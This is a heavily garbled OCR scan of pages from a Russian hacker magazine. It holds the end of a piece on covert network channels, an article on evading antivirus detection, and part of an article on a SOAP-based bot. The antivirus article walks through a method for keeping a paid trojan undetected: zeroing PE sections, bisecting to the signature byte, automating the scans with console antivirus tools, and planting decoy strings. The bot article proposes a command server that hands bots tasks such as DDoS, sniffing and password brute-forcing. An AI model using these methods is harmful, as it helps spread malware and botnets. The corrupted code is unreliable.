мени в ТСР-заголовке. НТТР-протокол дает еще большие возможности, 
поскольку включает в себя множество факультативных полей, которые 
можно безболезненно модифицировать в весьма широких пределах. 
Однако все это слишком заметно, и наиболее стойким кобнаружению на 
сегодняшний день остается протокол N1151411, работающий с 15 N. 

Может ли атакованный администратор обнаружить скрытые пассивные 
каналы хотя бы теоретически? Скрупулезный анализ сетевого трафика 
позволяет выявить некоторую ненормальность распределения І5Ю но 
для этого требуется обработать сотни тысяч «хакнутых» пакетов, срав- 
нивая их с оригиналами. П потому намного проще выявить посторонний 
ядерный модуль, отвечающий за создание и поддержку РСС-каналов, 
используя общие методики верификации целостности системы. Однако 
это уже совсем другой разговор, к которому мы еще вернемся, □с 
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АНТИ антивирусные 
технологии 



Кое-что о своевременной технической поддержке 
зловредного программного обеспечения 



ЭТАСТАТЬЯ ПРЕДНАЗНАЧЕНА В ПЕРВУЮ ОЧЕРЕДЬ ДЛЯЛЮДЕЙ, ИНТЕРЕСУЮЩИХ- 
СЯ ПРИНЦИПАМИ РАБОТЫ АНТИВИРУСНЫХ СКАНЕРОВ. МАТЕРИАЛ НЕСОДЕРЖИТ 
КАКИХ-ЛИБО ИНСТРУКЦИЙ ПО СОЗДАНИЮ ВРЕДОНОСНОГО ПРОГРАММНОГО ОБЕС- 
ПЕЧЕНИЯ И НЕ ЯВЛЯЕТСЯ ПРИЗЫВОМ К ДЕЙСТВИЮ. ВСЕ ОПИСАННОЕ НИЖЕ НЕПРО- 
ТИВОРЕЧИТУКРФИ СЛУЖИТИСКЛЮЧИТЕЛЬНО ДЛЯ БЛАГИХЦЕЛЕЙ. ИМЕНАВСЕХ 
ПЕРСОНАЖЕЙ ВЫМЫШЛЕНЫ, ИХСОВПАДЕНИЯ С РЕАЛЬНЫМИ СЛУЧАЙНЫ. 



аверное, каждый, кто когда-нибудь пробовал себя втакой 
нелегкой области программирования, как вирусописатель- 
ство, создав свой первый зловред, сразуже отсылал его в 
какую-нибудь антивирусную лабораторию. Повзрослев и 
ставумнее, вирусописатель, наоборот, начинает стремиться ктому, чтобы 
его творение как можно дольше оставалось незамеченным. А если этого 
достичь невозможно, он стремится к максимально быстрому и удобному 
выпуску стерильной версии. 

Допустим, есть некий программист-вирусописатель, назовем его Собес 
Он получил заказ от представителей интернет-андеграунда на созда- 
ние некоторой троянской программы. Причем троянец должен быть 
публичным и раздаваться всем в неограниченном количестве. Заказчик 
выдвинул одно важноетребование: кактолько зловред будет попадать в 



антивирусные базы, Собег должен выпускать его новую версию, которая 
не определяется антивирусом. За это Собег будет получать $1 000 в месяц. 
«Легкие деньги!» — подумают некоторые. И будутправы, ноприодном но. 
Нужен правильный подход, а точнее, технология. 

НЕМНОГО ТЕОРИИ 

Проведем небольшой ликбез по работе антивирусных сканеров. Итак, все 
сканеры имеют базы сигнатур вирусов. Сигнатура вируса — это нечто вро- 
де человеческих отпечатков пальцев для программ. Если вредоносное 
ПО попадает в антивирусную лабораторию, то с него сразуже «снимают 
отпечатки пальцев», или, говоря по-другому, получают его сигнатуру. В 
большинстве случаев это набор байт по определенным смещениям в 
файле. 
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Теперь немного о том, как выглядит процесс идентификации вируса 
в лаборатории. В общем случае файл проходит несколько этапов. 
Первый — это проверка подозрительной программы на как можно 
большем числе антивирусных сканеров других производителей. Если 
несколько антивирусов идентифицируют программу как вирус, то 
компьютер автоматически получает сигнатуру файла и добавляет его 
в базу. Если сканеры третьих производителей ничего не показали, то 
в дело может включиться полуавтоматический анализатор. Это спе- 
циальное ПО, которое запускает потенциального зло вреда в особой 
«песочнице» и отслеживает все его действия. На основании этих 
действий сигнатура файла также может быть добавлена в базы. Если 
и эта процедура ничего не дает, за файл берется самый совершенный 
на сегодняшний день программно-аппаратный комплекс — человече- 
ский мозг. Другими словами, несколько специально обученных дятлов 
тыкают на разные кнопки клавиатуры, возят по столу мышкой и через 
несколько минут выносят свой вердикт. Если программа окажется 
слишком хитрой, оригинальной и т.д., то она попадет к профи, которые 
разберут ее по косточкам и точно скажут, что это такое. 

Большинство вирусов и прочей нечисти отсеивается на первыхдвух 
этапах без всякого участия человеческого интеллекта. Те немногие, что 
пробилисьчерез кордоны автоматики, застревают на вирусных анали- 
тиках. Таким образом, труд нашего программиста под ником Собегбудет 
уничтожен буквально через несколько минут после попадания в антиви- 
русные лаборатории. Ноне просто же та к ему платят по 1 к американских 
денег в месяц? Собегдолжен бдить и на первый же пискантивируса 
реагировать модификацией своего творения. 

БЛИЖЕ К ПРАКТИКЕ 

Теперь, когда Собег знает, как работают антивирусные сканеры, он может 
смело заняться анализом своего кода с целью выявления мест, которые 
вызывают подозрения у антивирусного ПО. Но какже это сделать? 
Многие опытные вирусописатели могут посоветовать сделать свой код 
максимально похожим на тот, который генерируется компиляторами 
(если зловред написан на ассемблере). Но каждый раз просматривать 
исходник и пытаться наугад определить, что же именно вызвалотакую 
бурную реакциюу антивируса, совсем неправильно. Есть метод, который 
позволяете математической точностью определить, какой именно байт в 
файле является сигнатурой для антивируса. 

Как известно, все исполняемые файлы в ѵѵіп32 имеют РЕ-формат. У них 
есть заголовок, секция кода, секция данных, импорта, экспорта и т.д. Для 
начала надо определить, где в файле находится каждая секция и сколько 
байтона занимает. Когда это сделано, затираем нулями по одной секции. 
Советую начать с секции данных и закончить секцией кода. 

Итак, мы затерли первую секцию. Теперьсамое главное — проверяем 
файл антивирусом. Если зловред не детектится, то заветный байтик — в 



этой секции. Однако пусть это будет не та к, и бурная реакция сканера все 
еще имеет место. Тогда мы восстанавливаем затертую секцию и забиваем 
нулями другую, затем опять проверяем и смотрим результат. Так мы про- 
должаем до тех пор, пока на файл не перестанет ругаться антивирус. 
Допустим, секция, в которой находится злосчастный байт, определена. 
Далее методом деления пополам (философский прием «дихотомия» 

— примечание Лозовского) мы выясним, что именнотакраздражает 
а веров. Метод этот применительно к нашему случаю будет выглядеть при- 
мернотак: нужную нам секцию мы условно делим на две половины. Затем 
сначалатрем первую половину и проверяем сканером, если он ругается, 
то восстанавливаем первую часть, трем вторую и опять проверяем. Если 
а нти в и рус м ол ч ит, то те п е р ь уже дел и м ту ч а сть, кото ру ю тол ько что зате рл и , 
и забиваем нулямиужеее половины... предварительно, конечно, восстано- 
вив содержимое. Двигаясь дальше по это му а л го ритму, мы в конце концов 
найдемтот самый байт, которыйтакне нравится антивирусному сканеру. 
Теперьделоза малым — надо всего лишь чуть модифицировать код, 
чтобы этого байта там не было. Это, конечно, легче сделать, если зловред 
написан на ассемблере, но можно вбить машинные команды и прямо в 
бинарник. 

Все это справедливо тол ько тогда, когда детектирование происходит 
по коду. Но часто сигнатурами становятся строки в разделе данных или 
имена функций в импорте. В этом случае нужно просто изменить строку 
или использовать другую функцию. 

Всю процедуру поиска «нехорошего места» в программе можно делать 
ручками с помощью какого-нибудь Ьех- редактора. Но настоящий 
программист напишеттулзу, которая автоматизирует весь процесс. Ая 
приведу пример класса, который значительно облегчает работу с РЕ-фай- 
лами. На его основе можно создать инструмент, который сведет процесс 
нахождения байта сигнатуры к нескольким минутам. 

ПИШЕМ КОД 

Для работы с файлом в формате РЕ нам понадобится класс-описание: 

ИНТЕРФЕЙС КЛАССА ДЛЯ РАБОТЫ С РЕ-ФАЙЛАМИ 

сіазз СРЕРіІе 
{ 

риЫіс : 

ѵігСиаІ ѴОІБ МгіБеБОЗНеасІег (ѴОІБ) ; 
ѵігСиаІ ІІШТ КеасіБОЗНеасІег (ѴОІБ) ; 
ѵігіиаі ВООБ СБескАссезз (ѴОІБ) ; 
ѵігСиаІ ВООБ ІзРЕРіІе ( ѴОІБ) ; 

СРЕРіІе ( ) ; 
ѵігіиаі -СРЕРіІе () ; 

ѵігіиаі ШИТ КеасЮЪб есБЕпБгу ( ѴОІБ) ; 
ѵігіиаі ѴОІБ ИгіБеОЪб есБЕпБгу ( ѴОІБ) ; 
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МісговоЙ ОпеСаге Русскоязычный сайт известного антивируса Аѵаві 



ѵігБиаІ ШШ ЗеекТоОЬд есБЕпБгу (ѴОІБ) ? 
ѵігСиаІ БОШ ЗеекТоРЕНеасіег (ѴОІБ) ; 
ѵігСиаІ ДШТ КеабРЕНеабег (ѴОІБ) ; 
ѵігСиаІ ѴОІБ Ѵ/гіБеРЕНеабег ( ѴОІБ) ; 
ѵігБиаІ ѴОІБ СІозе(ѴОІБ) ; 
ѵігБиаІ ВООБ Ореп (БРСТЗТК згРЕЕіІе, 

ВООБ КеабОпІу = ЕАБЗЕ) ; 

БОЗНеабег БОЗНбг; 

РЕНеабег РЕНбг; 

ОкдесЕЕпЕгу ОкдЕпЕгу; 

СЗЕбіоЕіІе т_кРЕЕі1е; 
ргоЕесЕеб: 

БШКБ бШЕ ЕзеЕТоРЕкбг; 

} ; 

Функция РеасЮОБНеасІегсчитываетвбуфер 005-заголовок РЕ-файла и 
возвра щает количество записанных ба йт.СНескАссеввпроверяету РЕ-файла 
атрибут РеасЮпІу. Если файл только для чтения, то функция вернетРАбЗЕ. 
ІвРЕЕіІе проверяет, является ли файл исполнимым в формате РЕ. Если это та к, 
то результатом работы функции будетТРІІЕ. Посмотрим на код этой функции: 

КОД МЕТОДА І_5РЕРІІ_Е() 

ВООЬ СРЕЕіІе : : ІзРЕЕіІе (ѴОІБ) 

{ 

БШКБ Етр ; 

ш_]тРЕРі 1е . ЗеекТоВедіп ( ) ; 

т_кРЕЕі1е .Кеаб (&БОЗНбг , зігеоЕ (БОЗНеасіег) ) ; 

ІЕ (БОЗНбг. ЗідпаЕиге !=М2_ЗІСЫ) 
геЕигп ЕАБЗЕ; 

бШЕ ЕзеЕТоРЕкбг = БОЗНбг . ОЕЕзеЕТоРЕНеабег; 
т_]тРЕЕі1е . Зеек (бѵГОЕЕзеЕТоРЕЬбг , СЕіІе: :Ьедіп) ; 
т_]тРЕЕі1е. КеасІ (&Етр, зігеоЕ (БШКБ) ) ; 

ІЕ ( Етр ! = РЕ_ЗІСБ) 

геЕигп ЕАБЗЕ; 
геЕигп ТКБЕ; 

} 

Здесьфункция РеасІОЬІесіЕпігу считываетописание секции из за- 
головка в буфер. Результатом ее работы будет количество считанных 
байт. ѴѴгііеОЬІесіЕпІгу записывает описание секции в заголовок. 
ЗеекТоОЬІесіЕпІгу перемещаетуказатель для работы с файлом на начало 
описания секции в заголовке, а ЗеекТоРЕНеасіег перемещаетуказатель 
на начало РЕ-за головка. РеабРЕНеабегсчитывает РЕ-заголовок, а Сіове 
и Ореп соответственно закрывают и открывают файл. 

Функция Ореп при ни мает два параметра. Первый — это вгРЕЕІІе: имя 
файла, который следует открыть, а второй — РеасЮпІу: следует л и откры- 



вать файл только для чтения. 

ООЗНеабег, РЕНеабег и ОЬіесіЕпІгу — это структуры, описывающие соот- 
ветствующие части РЕ-файла. С некоторыми из них можно ознакомиться 
ниже. 

ОПИСАНИЕ СТРУКТУР 005НЕА0ЕК И ОВ.ШСТЕМТКѴ 

ЕуребеЕ зЕгисЕ 

{ 

Ж) КБ ЗідпаБиге; //Сигнатура 'М2' 

ѴГОКБ РагЕРад; //длина неполной последней страницы 
ѴГОКБ РадеСпЕ; / /длина образа (+заголовок) в 
512 -байтниках 

ѴГОКБ КеІоСпЕ; //число элементов в КеІосаЕіоп ТаЫе 
ѴГОКБ НбгЗіге; //длина заголовка в 16 -байтниках 
ѴГОКБ МіпМешогу; / /минимум требуемой памяти 
ѴГОКБ МахМешогу; / /максимум требуемой памяти 
ѴГОКБ КеІоЗЗ; / /сегмент стека (относительно КооЕЗ ) 
ѴГОКБ ЕхеЗР; //указатель стека 
ѴГОКБ СккЗшп; //контрольная сумма 
ѴГОКБ ЕхеІР; //счетчик команд 

ѴГОКБ КеІоСЗ; / /сегмент кода (относительно КооЕЗ) 
ѴГОКБ ТаЫОМ; //позиция в файле первого элемента 
КеІосаБіоп ТаЫе 

ѴГОКБ Оѵегіау; //номер оверлея 
ВУТЕ Кезегѵеб [32 ] ; //зарезервировано 
БШКБ ОЕЕзеЕТоРЕНеабег ; //зарезервировано 
} БОЗНеабег; 

ЕуребеЕ зЕгисЕ 

{ 

ВУТЕ ОЬз есЕБаше [ 8 ] ; 

БШКБ ѴігЕиаІЗіге ; 



МісгобоТі ОпеСаге 



Чтобы скрыть зловреда отбольшинства антивирусов, достаточно изме- 
нить всего один байт, который является ключевым в сигнатуре. Но есть 
один продукт, который этого не боится, — это МісговоЙ ОпеСаге. Да, да... 
Это именнототантивирус, который занимает последние места втестах и 
отчаянно матерится всем интернет-сообществом. Ноте ребята, что созда- 
вали антивирусный движок, подошли к этому делу основательно. 

Если ОпеСаге детектит зловреда по секции кода, для его сокрытия 
недостаточно изменить один байт. Надо найти и переделать несколько 
инструкций, которые раскиданы по всемутелу файла. Это оченьусложня- 
ет процесс поиска, ведь для этого нам нужно затереть уже не один, а не- 
сколько плохих байт. Если хотя бы один байт мы не найдем, то изменение 
всех остальных нам не поможет. Мы даже не узнаем, правильно ли мы их 
нашли, ведь они зависимы и для их выявления надо разрабатывать спе- 
циальный алгоритм. Он не очень сложен, но все же достаточнотрудоемок. 
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Упрощенные системные требовані 

ІгІеР Репііит или АМС*АіШоп* 1 266 МНг, 
Ѵѵіп^5іл'й е Ме. 2000 или ХР 
Масготейіа НазП РІауег — 
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ОШКВ ЗесОіопКѴА; 
вдакв РЪузісаІЗіге; 
ШЮКВ РЕузісаІОІІзеЦ ; 
ВУТЕ Кезегѵесі [ 10 ] ; 
ВШКВ ОкфесЕЕІадз; 

} ОЕдесОЕпОгу ; 




Используя этот класс, легко можно написать ути литку, которая 
будет помогать в определении плохого байта. Она сможет давать 
пользователю возможность выбрать, какую именно секцию тереть. 
Если забивание секции нулями помогло, то появляются две кноп- 
ки: «Затереть первую половину» и «Затереть вторую половину», а 
также третья, по нажатию на которую программа будет понимать, 
что дальше надо работать с той половиной, которую выбрал поль- 
зователь. То есть фактически программа будет выполнять лишь 
затирание нужных частей исполнительного файла, а его проверку 
и логику алгоритма половинного деления будет осуществлять 
пользователь. Таким образом поиск интересующего нас байта 
может статьделом нескольких минут. 

РАЗВИТИЕ ИДЕИ 

Можно пойти и дальше. Лень, как известно, — двигатель про- 
гресса, и весь процесс определения неугодного антивирусу байта 
можно свести к одному клику. Сделать это очень просто. Почти у 
каждой уважающей себя антивирусной компании есть консоль- 
ная версия своего продукта. Так вот нажимать на кнопочки и 
анализировать результат работы сканера будеттоже программа. 
После каждого забивания нулями определенного участка файла 
тулза будет запускать консольную версию антивируса и сканиро- 
вать бинарникс затертым куском, а затем парсить выдачу резуль- 
татов. Делается это не очень сложно, а жизнь способно упростить 
до предела. Особо извращенные программисты могут попробо- 
вать распарсить результаты скана антивирусов с графическим 
интерфейсом. 

Таким образом, получается, что для определения плохого байта доста- 
точно за пустить утилиту, выбрать, какой файл будет проверяться, нажать 
кнопку «СТАРТ» и, как нас учит компания Майкрософт, «откинуться на 
спинку кресла». 

Какуже говорилось выше, послетого какзаветный байтик найден, дос- 
таточно лишь немного изменить исходный код. Если зловред написан на 
ассемблере, это не составит ни какого труда, надо лишь немного напрячь 
мозги подумать, чем именно заменить эту инструкцию. Иногда достаточно 
вставить пару бессмысленных команд, итроян становится безгрешным 
для сканеров. 



Очень часто антивирусы реагируют на текстовые строки втеле файла. 
Допустим, если вредоносная программа — это какой-нибудьтроян-даун- 
лоадер, то антивирус может реагировать на строку с линком к скачива- 
емому им файлу. Зная это, хитрый хакер способен пойти на небольшую 
уловку: зашифровав реальную строку, он оставит фейковую, отвлекающую 
внимание. В 90% случаев аверы будут детектить троя на по ней. То есть 
для выпуска следующей чистой версии достаточно изменить эту строку. 
Первое время фокус будет прекрасно работать, но в конце концов обман 
будет раскрыт. Чтобы оттянуть этот момент, надо придумывать фейковые 
строки, максимально приближенные к реальности. 

Многие вирусописатели могут возразить мне, сказав, что антивиру- 
сы не детектируют зловредов всего по одному байту. Это в какой-то 
степени правда, но есть одна известная мудрость: «Прочность цепи 
определятся самым слабым ее звеном». В нашем контексте это значит, 
что достаточно изменить всего один, но самый «слабый» байт, и вся 
сигнатура станет бесполезна. Такой недостаток есть практически во всех 
популярных антивирусах. N0032, Аѵаві:, Казрегвку, АпііѴіг и т.п. — все 
они страдают этим. Есть и одно исключение, о нем можно почитать во 
врезке. 

ЗАКЛЮЧЕНИЕ 

Современные антивирусы борются за клиента не качеством продукта, а 
количеством записей в базе сигнатур. Оно и понятно, когда в день появля- 
ется по несколько сотен вредоносных программ, надо как можно быстрее 
добавить их в свои базы и обеспечить защиту пользователя. Но люди, 
которые создают этих зловредов, тоже не сидят сложа руки и постоянно 
выпускают новые версии. Метод, описанный в статье, — лишьодин из 
способов, с помощью которого «чистую» версиютроянца/червя ит.д. 
можно выпустить буквально через несколько минут после попадания его 
сигнатуры в базы антивирусных сканеров. 

Думаю, наш программист под ником Собег воспользовался подобной 
технологией, исправно получает свои честно заработанные $1 000 каждый 
месяц и чувствует себя счастливым человеком. Антивирусные компании 
тоже довольны... у них есть, чем пополнить свои базы, азначит, клиенты 
будут и дальше покупать их продукт. Счастлив и рядовой пользователь 
— он видит, что его любимый антивирус развивается и находит все новых 
и новыхзловредов. Воттакая вот гармония :1. тг 
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БОАР-2, ИЛ 
восстание машин 



Рассматриваем технологию 50АР на хакерской практике 



В ПРЕДЫДУЩЕЙ СТАТЬЕ ПО ЭТОЙ ТЕМЕ (В МАРТОВСКОМ ][) МЫ КОРОТКО РАЗОБРАЛИ ОС- 
НОВЫ РАБОТЫ С 50АР НА РЕРЬ. А СЕГОДНЯ МЫ НЕМНОГО РАСШИРИМ ОБЛАСТЬ НАШЕГО 
ИНТЕРЕСА И РАССМОТРИМ 50АР В КОНТЕКСТЕ РЕАЛЬНОГО ПРАКТИЧЕСКОГО ПРИМЕ- 
НЕНИЯ, ТО ЕСТЬ БУКВАЛЬНО ТАК, КАКОНО БЫВАЕТУ СТАРШИХ ПАЦАНОВ, КОГДАОНИ 
ПИШУТ РАБОЧИЕСКРИПТЫ С ИСПОЛЬЗОВАНИЕМ НОВЕЙШИХ МЕГАТЕХНОЛОГИЙ. 



ОАР редко бывает нужен сам по себе, без сторонних биб- 
лиотек. Понятное дело, что для более-менее жизненного 
примера нам потребуется некоторый набортаких библиотек. 
Итак, коротко опишем то, чем сегодня воспользуемся. 

ЧТО ТАКОЕ РОЕ И ЗАЧЕМ ОНО НАМ НУЖНО 

РОЕ — это пример использования концепции зіаіе-машины на базе конеч- 
ных автоматов, которая позволяетудобно организовать многопоточность в 
Регі. Тут следует оговориться, что на самом деле мы получаем псевдомно- 
гопоточность за счет конвейерного перераспределения ресурсов между 
короткими обработчиками событий (об этом ниже), на которые дробится 
исполняемый код программы. В некоторых случаях это дает существенный 
приростскорости, но всегда нужно помнить, что на самом деле РОЕ строго 
последователен и фактически эмулирует подсистемууправления процес- 
сами, только на более высоком уровне абстракции и в большем временном 
масштабе. Однако сегодня мы не будем яростно вгрызаться в особенности 
этой библиотеки, поскольку не она является предметом нашего интереса, а 
лишь коротко рассмотримте инструменты, которыми воспользуемся в на- 
шем примере. Ну и, какобычно, если вдругтебе не хватит, добавка на СРАЫ. 
Работает РОЕ очень просто. Огрубляя, можно сказать, что РОЕ обеспечи- 
вает создание потоков выполнения, управление ими и обмен сообщения- 
ми между ними. Хоть это и не верно по сути, такую картинку вполне можно 
использовать на первых порах. Вообще же идеология РОЕ основана 
на сессиях и обработке событий. Все основные внутренние функции, 
которые реализуютлогикууправления сессиями, собраны в двух модулях: 



Р0Е::Кегпе1 и Р0Е::5еззіоп. В процессе создания сессии мы определяем 
обработчики некоторых событий, самыми важными из которых являются: 
_5ІагІ и_зІор, которые генерируются при порождении сессии и при ее 
уничтожении. Другими словами, эти события какбы говорят сессии, что 
она принята на исполнение ядром. Ядро же манипулирует сессиями и 
распределяет между ними вычислительные ресурсы, эмулируя подсис- 
темууправления процессами. Когда мы создаем объект Р0Е::5еззіоп, 
мы фактически сообщаем ядру о себе и поручаем емууправление своей 
сессией. Ядро пихает ее в свою внутреннюю очередь и начинаетей как-то 
рулить — как именно, нас сейчас не интересует. Различные сессии могут 
общаться друге другом, генерируя сообщения и подсовывая их ядру на 
имя другой сессии. Это как посылка, в поле получателя которой стоит 
псевдоним другой сессии и за отправку которой отвечает ядро. Каждое 
такое сообщение будет обработано сессией, если в ней определен обра- 
ботчикодноименного события (можно описать обработч ик_сІеі : аи 11;, в ко- 
торый будет падать все, что не было подхвачено конкретными именован- 
ными обработчиками). Это можно рассматривать как порождение события 
или как обмен управляющими сообщениями. Причем события можно 
порождать разными особо извращенными способами — с задержкой, по 
расписанию ит.д. Очень удобно то, что ядро берет на себя все проблемы 
с организацией асинхронной коммуникации между сессиями. Таким 
образом, можно считать, что это фреймворкдля организации мультисес- 
сионных приложений. Вотего-то мы и заюзаем. Сточки зрения програм- 
мирования делается все это не просто, а очень просто, а как конкретно, 
станет ясно из кода примеров, поэтому сейчас для экономии места мы не 
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Код клиент-бота для перебора паролей 



Кодим! 



будем на этом останавливаться. 

Рассмотрим РОЕ как набор модулей. Он построен по многоуровневой 
схеме, когда поверх слоя ядра ( РО Е : : Кегпеі и Р0Е::5еввіоп) накручива- 
ются слои, которыетак или иначе скрываютего работу. Например, есть 
слой РОЕ: :ѴѴЬееІ, который реализует набор стандартных задач средст- 
вами РОЕ. Кстати сказать, существует модуль РОЕ: :ѴѴЬееІ: : Ри п , который 
позволяет сделатьтру-многопоточную обработку событий посредством 
отфоркивания детей при сохранении еѵепі-сообщения с ними. Можно 
написать модули, используя которыеты вообще не будешьзнать, что все 
сделано многопоточно и поверх РОЕ. Такие дела. 



По идее, этот модуль работает следующим образом: в самом начале мы 
порождаем объект сервера, который будет отвечать за отправку ответов 
на запросы. 



РОЕ : : СотропепД : : Зегѵег 
' АЫА8 ' 
'АББКЕЗЗ' 

' РОКТ ' 

' НОЗТЫАМЕ ' 



: : ЗОАР->пем ( 

=> 'МуЗегѵег', 

=> ' ІосаІТюзД ' , 

«> 31337, 

=> 'МуНозД . сот' , 



50АРИР0Е 

Библиотеки для реализации 50АР посредством РОЕ, конечно же, уже тоже 
созданы и есть на СРАМ. Что нам дает работа с 50АР через РОЕ? С учетом 
всего вышесказанногоу нас получается эмуляция многопоточной обработ- 
ки. Совершенно очевидно, что она даетпримерното же, чтотру-многопо- 
точностьдает веб-серверам, например всеми любимому АрасЬе, — воз- 
можность одновременно обрабатывать несколько запросов. Так, если твой 
ЭОАР-демон реализует доступ к какому-то ресурсоемкому или затратному 
по времени коду (например, доступ кбазе и предварительная обработка 
результатов с последующей передачей клиенту), а количество клиентов 
растет и всем им нужно обеспечить приемлемое время доступа,™ придется 
заморачиваться многопоточной обработкой. Так вот РОЕ все берет на себя и 
действительно существенно ускоряет работу ЗОАР-демона. 

Замечу, что Р0Е::СотропепЕ:5егѵег::50АР работает на базе 
Р0Е::СотропепЕ:5егѵег::5ітрІеНТТР, но в библиотеке модулей СРАЫ 
естьтакже модуль Р0Е::СотропепЕ:5егѵег::5ітрІеНТТР::РгеБогк, кото- 
рый, какясно из названия, обеспечивает действительно многопоточную 
обработку запросов. Переписать Р0Е::Сотропеп1;::5егѵег::50АР с под- 
держкой Р0Е::СотропепЕ:5егѵег::5ітрІеНТТР::РгеБогк, чтобы ускорить 
работу демона, — задача совсем не сложная. Модуль РОЕ::СотропепЕ: 
5егѵег::50АР использует функции 50АР::Ыіе, который достаточно под- 
робно обсуждался в прошлой статье, а также реализует некоторую про- 
слойку между приемом запроса и отправкой ответа, давая возможность 
более гибко диспатч итьзапросы и обеспечивая собственно распаралле- 
ливание. Эффект распараллеливания достигается за счеттого, что прием 
и обработка сообщения делятся на несколько этапов, каждый из которых 
обрабатывается в рамках своей сессии. Получается конвейер, и клиентам 
не нужно ждать, пока отработает предыдущее соединение, чтобы был 
принят их запрос. Этот модуль гарантирует, что до и после все будет 
работать та к же, какесли бы его не было. Сериализатор, десериализатор, 
передача и прием — все нам уже хорошо знакомо. 

Ноу модуля есть и свои недостатки. К примеру, если ты пишешь что-то 
жутко корпоративное, заморочен стандартами и тебе нужен тотальный 
контроль над ЫатеЭрасе’ами в оберточныхтэгах.то придется помудрить 
сЭегіаІігег’ом, конструктором и генерацией сообщений ответа внутри 
самого модуля Р0Е::Сотропеп1;::5егѵег::50АР. Но это тема заслуживает 
отдельной статьи, а сейчас мы воспользуемся всем готовеньким, по- 
скольку в данном случае нам хватиттого, что предоставляет модуль 
Р0Е::СотропепЕ:5егѵег::50АРсам по себе. 



Вообще говоря, несмотря на используемый стиль объектно-ориентиро- 
ванного программирования, там не происходит никакого порождения 
объекта, а создается сессия с псевдонимом МуЗегѵег, которая понимает 
несколько основных событий: ООЫЕ, БАЮ, РАѴѴООЫЕ, АООМЕТНОй, 
ОЕБМЕТНОО. Присвоение псевдонима сессии делает ее неубиваемой 
для ядра РОЕ, и эта сессия будет висеть какдемон, поскольку ядро счита- 
ет, что именованная сессия нужна для обработки событий, генерируемых 
другими сессиями (работает в пассивном режиме). Это как разто, что нам 
нужно для сервера. 

БОИЕ — событие, которое посылается, когда все готово. В качестве 
аргумента принимает объект50АР::Резроп5е, который автоматически 
сериализуется, какесли бы мы использовали 50АР: : Бііе. 

РАЮ — что-то не та к. Принимает 50АР::РеБропБе, строку кода ответа 
(наш собственный код, который будет понятен вызывающей стороне), 
строку ошибки, строку пояснения ошибки и строку, символизирующую 
объект, вызвавший ошибку. Назначение этих строкусловны — туда можно 
понапихать любой информации, лишь бы нам было весело. 

ПАѴѴООЫЕ — тоже, что и БОМЕ, только данные в 50АР::РеБроп5е->соп1:епІ 
не сериализуются. 

АйОМЕТНОО — регистрирует метод, который можетбыть принятсерве- 
ром. Принимает следующие аргументы: псевдоним сессии обработки (об 
этом ниже), имя метода. Фактически тут мы говорим, что при попадании 
к нашей сессии сервера запроса на выполнение метода, определенного 
во втором параметре, мы диспатчим ее на сессию, определенную первым 
параметром. 

ОЕБМЕТНОО — удаляет метод. 

Это лишь краткое описаниетого, что нам потребуется (потрадиции отсы- 
лаютебя на СРАЫ —там круто, его читает даже Форб). 

Послетого как мы создали объект сервера, мы создаем сессию, в которой 
определяем основные обработчики _5І:аг1:, _5І:ор и обработчики мето- 
дов, которые зарегистрируем в сессии сервера с помощью события 
АйОМЕТНОО. На эту сессию передастся управление, когда сессия серве- 
ра получитзапрос. То есть метод, запрошенный клиентом через 50АР на 
стороне сервера, будет порождать одноименное событие, которое должно 
быть адекватно обработано. 

РОЕ: : Зеззіоп-хзгеаДе ( 

' іп1іпе_зДа1сез ' => { 

'_зДагЦ' => \&зеДир_зегѵісе , 
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'-ЛЬор' => \&зЬиЪс1оѵт_зегѵісе , 

'_с!ебшІЕ ' => \&<іізраДс]т_тападег , 

} , 

) ; 

Если мы не знаем, какие запросы будем обрабатывать (например, думаем 
о возможном расширении), и берем их, к примеру, из какого-нибудь 
конфига, то лучше всего определить обработчик_с!е!аиИ, в который будут 
сыпаться всезапросы. 

Ух, стеорией закончили. Я понимаю, что человеку, который сталкивается 
с этим первый раз, все это кажется весьма мутным и запутанным. На 
самом деле все очень просто. Можно покурить доки, а потом на свежую 
голову написать пару приложений на базе сессий — и считай, знания у 
тебя в кармане (вообще, это универсальный способ во что-то въехать). 
Есть и другой способ — прочитай книжку по конечным автоматам, и тогда 
концепция еѵепі-бгіѵеп сессий покажется тебе простой и понятной, од- 
нако кто в наше время ХМ И и ѴѴеЬ 2.0 заморачивается такими олдскуль- 
н ы м и вещами? Итак, обратимся к практической части. 

ЧТО МЫ ХОТИМ СДЕЛАТЬ 

Ахотим мы распределение вычислений на базе совсем новыхтехнологий. 
Мы, как продвинутые парни, будем использовать обмен ХМБ-сообщени- 
ями, а не передачу мутной бинарщины в собственном, только что выду- 
манном формате. Какие преимущества нам это даст, я пока не решил, но 
какие-то, безусловно, даст (в этом месте я всегда вспоминаютакие слова, 
как«интеграция» и «совместимость»). 

Итак, один сервер и куча клиентов, которые его дергают. Клиент будет 
уметь ждать конкретное событие на локальной машине. Когда такое 
событие, например освобождение ресурсов процессора, произойдет, 
клиент пошлет запрос Главному Серваку и получит от него задания 
на выполнение. Задания могут быть любыми — на этот код можно 
повесить какой угодно функционал, поскольку мы рассматриваем 
общий подход ктакого рода задачам. Например, можно заставить 
ботов ООоЗ’ить удаленные машины по списку или снифать трафик на 
предмет чего-то интересного — применений тьма, с минимальными 
доработками можно сделатьтрадиционный тру-хакерским пример 
— распределение заданий на перебор паролей (ноя тебе этого не 
говорил; и вообще, если что, я все эти слова прочитал на заборе и, что 
они значат, не знаю). Также боты могут быть дернуты по команде. В 
общем, тут большой простор для фантазии, но поскольку нас сегод- 
ня интересуеттранспорт через 50АР, мы не будем останавливаться 
на том, что конкретно будет делать наш бот. Бот получит задание и 
данные и кинет их в класс-заглушку, написать которую ты сможешь 
самостоятельно. 

Кто-то захочет возразить: «На фига все это делать на 50АР?» Конечно, 
это расточительно сточки зрения ресурсов. Конечно, это не самый 
рациональный способ написания бота. Такого бота хорошо видно. 
Однако моя цель — продемонстрировать возможности технологии на 
каких-либо реальных примерах и тем самым навести тебя на мысли 
отом, какеще можно использовать эту замечательную штуку — 50АР. 
50АР — вещь чрезвычайно гибкая, простая и одновременно мощная. И 
поверь, написание ботов на его основе — не такая уж безумная идея ;). 

КОД СЕРВЕРА 

Код сервера аккуратно сложен на диске. Там все достаточно просто: 
создание объекта сервера, созданиеуправляющей сессии, запускядра 
РОЕ ит.п. 



В 5еІир_5егѵісе мы регистрируем набор функций, которые будем обра- 
батывать. Пусть этот набор будет задаваться в модуле РипсЫзЕ Это даст 
нам задел расширяемости нашего управляющего сервера и ботов. Если 
вместо массива Іізі использовать хэш {функция => модуль}, то можно 
динамически подключать эти модули и передавать им управление. То 
естьдоработка будет заключаться в копировании в папкусервера нового 
